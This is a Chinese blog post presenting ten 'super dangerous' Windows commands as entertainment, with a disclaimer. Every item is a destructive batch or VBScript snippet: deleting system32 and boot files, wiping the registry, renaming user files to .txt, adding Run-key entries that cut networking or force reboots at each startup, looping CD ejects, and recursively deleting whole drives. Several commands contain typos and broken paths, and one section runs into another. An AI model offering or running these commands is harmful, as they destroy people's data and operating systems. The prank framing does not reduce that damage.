10大超級(jí)危險(xiǎn)指令<娛樂(lè)為主,千萬(wàn)別嘗試,如出現(xiàn)問(wèn)題,概不負(fù)責(zé)>

0x0 藍(lán)屏死機(jī)

顧名思義,就是會(huì)使電腦藍(lán)屏后死機(jī)

Del %windowsdrive%\*.* /f /s /q Shutdown -s -f -t 0

0x1 更改文件后綴名

會(huì)使系統(tǒng)中的文件錢(qián)包轉(zhuǎn)換成txt文本

Ren *.doc *.txt Ren *.jpeg *.txt Ren *.lnk *.txt Ren *.avi *.txt Ren *.mpeg *.txt Ren *.com *.txt Ren *.bat *.txt

0x2 刪除system32

Del c:\windows\system32\*.* /q

0x3 使PC永久崩潰

 @echo off Attrib -r -s -h c:\autoexec.bat Del c:\autoexec.bat Attrib -r -s -h c:\boot.ini Del c:\boot.ini Attrib -r -s -h c:\ntldr Del c:\ ntldr Attrib -r -s -h c:\windows\win.ini Del c:\windows\win.ini 

0x4 刪除所有的注冊(cè)表

@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*

0x5 永久禁用網(wǎng)絡(luò)

echo @echo off>c:\windows\wimn32.bat 
echo break off>>c:\windows\wimn32.bat 
echo ipconfig/release_all>>c:\windowswimn32.bat 
echo end>>c:\windows\wimn32.bat 
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f 
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVision\Run /v CONTROLexit /t reg_sz /d c:/Windows/wimn32.bat /f 
Pause

0x6 一直按回車(chē)

Set wshShell=wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys"~(enter)" loop

0x7 啟動(dòng)電腦后自動(dòng)關(guān)機(jī)

echo @echo off>c:\Windows\hartlell.bat 
echo break off>>c:\Windows\hartlell.bat 
echo shutdown -r -t 11 -f>>c:\Windows\hartlell.bat 
echo end>>c:\Windows\hartlell.bat 
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windwos\CurrentVersion\Run /v startAPI /t reg_sz /d c:\Windows\hartlell.bat /f 
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v /t reg_sz /d c:\Windows\hartlell.bat /f 
pause

0x8 開(kāi)啟CD蜂鳴器

Set oWMP=CreateObject("WMPlayer.OCX.7") 
Set colCDROMs=oWMP.cdromCollection 
do 
if colCDROMs.Count>=1 then 
For i=0 to colCDROMs.Count -1 
colCDROMs.Item(i).Eject 
Next 
For i=0 to colCDROMs.Count -1 
colCDROMs.Item(i).Eject 
Next 
End If 
wscript.sleep 100 
loop 10. rd/s/q D:\ rd/s/q C:\ rd/s/q E:\

0x9 格式化硬盤(pán)

rd/s/q D:/
rd/s/q C:/
rd/s/q E:/
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容